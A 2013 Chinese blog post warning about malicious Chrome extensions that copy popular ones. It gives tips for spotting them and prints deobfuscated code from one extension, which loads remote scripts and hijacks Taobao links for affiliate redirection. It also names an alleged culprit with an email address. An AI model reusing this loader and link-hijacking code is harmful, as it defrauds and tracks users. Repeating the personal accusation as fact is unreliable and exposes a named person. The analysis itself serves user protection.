title: 關於Chrome擴展的一些個人看法
tags:
  - Chrome
date: 2013-11-20 21:34:49
---

擴展就像是一個app  每裝一個擴展就爲自己的瀏覽器增加了一個新功能

但是由於谷歌近乎不存在的審覈機制，給了一些非常噁心的人可乘之機。
這就是：僞造一個與熱門擴展功能、名字類似的擴展，大量騙取用戶信任。
在用戶購物時，強行插入自己的返利代碼，更過分的情況，盜取支付寶密碼也是不再話下。我觀察了有一段時間，發現惡意擴展的作者主要克隆的對象包括
“優酷去廣告”“火車訂票助手”“購物類擴展”
而且幾乎是一人所爲。 後來魯夫的愛在調查中發現大量抄襲的惡意擴展之人是
1.優酷殺手, 剽竊者: 陳雨文 (工信部網站備案 瓊ICP備12003507號-1) ;
郵箱 : 1330830326@qq.com ;
微博: [http://weibo.com/kxhaitao](http://jump.bdimg.com/safecheck/index?url=x+Z5mMbGPAtoMZ8Wl5xjxyfExWIY9SqSa6SQI4+XXdSvnSpA9t25OAHb4ginhO7h9JFUfLgbnlvG/rShDRJ4ZNCQ99w3Rb3F+N0Y8qkYZnGtMfdKINW2MzgQZcQ4CMZ7dj2oeHoEzTI=) ;
網站: [www.kxhaitao.com](http://jump.bdimg.com/safecheck/index?url=x+Z5mMbGPAu8eIEjDQPqEGukkCOPl13UG52s7ktdk++zgAYkoBxUyhfQ78Ldja1GzHPw/fdCSmzMDxGq7w2I+yM8YyvhRNkE+ztDQT7M8ZhQw5Ves6VjOHnPwGfiBcHEMDxm7iZ2BjQ=)
並在自己博客公佈了相關信息。（[http://opengg.me/hall-of-shame/](http://jump.bdimg.com/safecheck/index?url=x+Z5mMbGPAvXX6/CoQmlopLQSBpzkesqlJTaCAbhToOLTQNvfRYxDIGWnuxy8ZkYAdviCKeE7uH0kVR8uBueW8b+tKENEnhk0JD33DdFvcX43RjyqRhmca0x90og1bYzOBBlxDgIxnt2Pah4egTNMg==)）

那麼不懂js的小白們如何確認一個擴展是惡意的還是乾淨的？

0、優先使用腳本，而不是擴展，因爲腳本可以制定運行的網站，代碼透明
而那些一上來就告訴你“此擴展程序可以訪問：
•您在所有網站上的數據
•您的標籤頁和瀏覽活動”的擴展，那就要一定小心了。

1、看作者
通常由開發者原創的擴展，會在作者名字裏添加自己的網站和更新情況。
一般的開發者都有自己的開發主頁，而且會有更新日誌。
而惡意擴展的作者，則會起名“goole官方”“谷歌推薦” “迅雷”等具有迷惑性的作者名字。實際上這些名字和谷歌官方沒有任何關係。

2、看評價
需要注意的是，惡意擴展的作者，通常會僱傭水軍進行刷分，所以不僅要注意評論，還要看一看評論的人是不是水軍。

3、看來自該開發者的更多內容
這個可謂最明顯的特徵，比如chrome惡意擴展“優酷海外版”，當你查看這個作者的其他擴展時，會發現如下諸如
“優酷vip破解”“12306訂票”“優酷殺手”等擴展，呵呵，這些無一例外都是惡意+抄襲擴展，你可以看到那個人已經喪心病狂到什麼程度了。

4、
Chrome://flags/打開Enable extension activity UI這個項目，然後每個擴展的活動你就能自己監控了

[![](http://juanzii.me/1/wp-content/uploads/2013/11/c903c0160924ab185b41bc3b34fae6cd7a890bc8.png)](http://juanzii.me/1/wp-content/uploads/2013/11/c903c0160924ab185b41bc3b34fae6cd7a890bc8.png)

我已經舉報過不下10次給谷歌，每次擴展下架後，過幾天換一個號就能重新上架。
最後強烈呼籲谷歌加強擴展的管理和審覈！！！！！！！！！

-------------------以上是貼吧裏面一個關於防範惡意擴展的帖子 [http://tieba.baidu.com/p/2222875761](http://tieba.baidu.com/p/2222875761)

雖然有了谷歌官方的應用商店 但是安全性並不能保證  有些擴展就渾水摸魚

谷歌又在月初宣佈未來要禁止商店外的未審覈擴展安裝 ( [http://safe.zol.com.cn/410/4109397.html](http://safe.zol.com.cn/410/4109397.html))

這樣一來  谷歌爲了chrome擴展商店的5美刀申請費用 真是喪心病狂   未審覈的擴展不一定都是不安全的  那些商店外優秀的擴展還是很多的  谷歌真是一棍子打死那麼多  這是很不理智的做法 相比之下  firefox的擴展商店審覈機制很嚴格  如果你提交的擴展存在一個可疑或未知的外部引用  就會審覈不通過或者下架

有些chrome擴展會引用一些未知來源的外部文件  可以教你們如何辨別什麼是惡意擴展

你首先可以查看這個擴展的manifest.json  (這個文件存在於你的chrome瀏覽器配置文件夾的userdata下 可以參考官方文檔 [http://www.chromium.org/user-experience/user-data-directory](http://www.chromium.org/user-experience/user-data-directory))

如果manifest.json裏面出現以下字段就要警惕了
<pre class="brush: js; title: JavaScript">"content_scripts": [ {
      "js": [ "js/inject.js" ],
      "matches": [ "http://*/*" ],
      "run_at": "document_idle"
   } ]</pre>
content scrpits是在頁面內運行的JavaScript腳本，通過使用標準的DOM，可以獲取或修改用戶瀏覽頁面的詳細信息。一般Chrome擴展通過content scripts用來增強特定網站功能，除少數對所有網站都有用的擴展（如迅雷私有鏈轉換擴展）之外，matches項只需要包含特定網站即可。而我遇到的這個擴展，顯然不需要有在任何網站運行JS的權限。

&nbsp;

清單文件看完 可以看看其他的.js文件裏面寫了什麼  例如：
<pre class="brush: js; title: JavaScript">(function(){
    function init(){
        var s,head;
        s=document.createElement("script");
        s.type="text/javascript";
        s.charset="utf-8";
        s.src="http://xxx.xxx.com/js/xxx/extension.js";
        head = document.getElementsByTagName('head')[0];
        head.appendChild(s);
    }
    init();
})();</pre>
這段代碼又引入了作者服務器上的一個js文件，也就是被Page Speed發現的那個文件。引入在線文件的好處是靈活可控，服務端可以隨時更改策略。再看下這個文件的內容：

&nbsp;
<pre class="brush: js; title: JavaScript">(function(){
  var s,head;
    s=document.createElement("script");
    s.type="text/javascript";
    s.charset="utf-8";
    s.src="http://xxx.xxx.com/js/extension.min.js";
    head = document.getElementsByTagName('head')[0];
    head.appendChild(s);
})();</pre>
很囧的是這個js繼續引入了另外一個js文件，好在沒有更多了，這就是我們要找的。代碼被壓縮過，[jsbeautifier](http://www.imququ.com/admin/blogs/post/add/jsbeautifier)下，真相大白
<pre class="brush: js; title: JavaScript">SITE_PATTERN: {
    "^(http|https)://www.(taobao|tmall).com/": "tb",
    "^(http|https)://*/*": "other"
}
//...
injectHtml: function (a, b) {
    switch (b.site) {
        case "tb":
            A1eg300.linkConvert();
            break;
        default:
            break
    }
}
//...
linkConvertProbability: function () {
    var a = 31;
    var b = 10;
    var c = new Date().getMilliseconds();
    var d = c % a;
    var e = A1eg300.util.getRandomNum(0, a - 1);
    d = Math.round(d / b);
    e = Math.round(e / b);
    if (d == e) {
        return true
    } else {
        return false
    }
}
//...
linkConvertParams: function (a, b) {
    var c = "api/linkparam/";
    var d = {
        "key": a,
        "op": "get"
    };
    A1eg300.util.jsonp(c, d, b)
}
//...
linkConvert: function () {
    var a = true;
    if (a) {
        var b = A1eg300.keys.userLinkConvert;
        A1eg300.linkConvertParams(b, function (c) {
            var d = c.result;
            if ( !! d) {
                var e = false;
                if ( !! c[b]) {
                    A1eg300.params.isLinkConverted = true
                };
                if (!A1eg300.params.isLinkConverted) {
                    e = true
                };
                if (e) {
                    var f = c.redirectUrl;
                    A1eg300.$("a").each(function () {
                        var g = A1eg300.$(this);
                        var h = A1eg300.$(this).attr("href");
                        g.click(function () {
                            if (!A1eg300.params.isLinkConverted &amp;&amp; "undefined" !== typeof h &amp;&amp; "" !== h &amp;&amp; null !== h) {
                                f += "?r=taobao&amp;link=" + encodeURIComponent(h);
                                A1eg300.$(this).attr("href", f);
                                var i = true;
                                var j = 7 * 24 * 3600;
                                A1eg300.api.setCookie(b, i, j, function () {
                                    A1eg300.params.isLinkConverted = true;
                                    A1eg300.$(this).attr("href", h)
                                })
                            }
                        }).mouseover(function () {
                            var i = A1eg300.$(this).attr("href");
                            if (f === i) {
                                A1eg300.$(this).attr("href", h)
                            }
                        })
                    })
                }
            }
        })
    }
}</pre>
上面這段代碼至少做了幾件事：獲取用戶當前瀏覽的頁面url並將其分類(tb|other)；將url發送給服務器（linkConvertParams）；根據服務器返回的內容替換頁面上的鏈接地址（linkConvert）。

Google Chrome官方商店的審覈過的擴展都這樣   還會讓人放心嗎？不過chrome的擴展編寫的代碼很透明  自己可以很方便查看修改

如果以後真的谷歌封了第三方未審覈擴展的安裝權限  我真的會用回Firefox 希望谷歌自己自重自律。

&nbsp;

&nbsp;

----本文參考自 [http://www.imququ.com/post/chrome-extensions-and-user-privacy.html](http://www.imququ.com/post/chrome-extensions-and-user-privacy.html)

&nbsp;
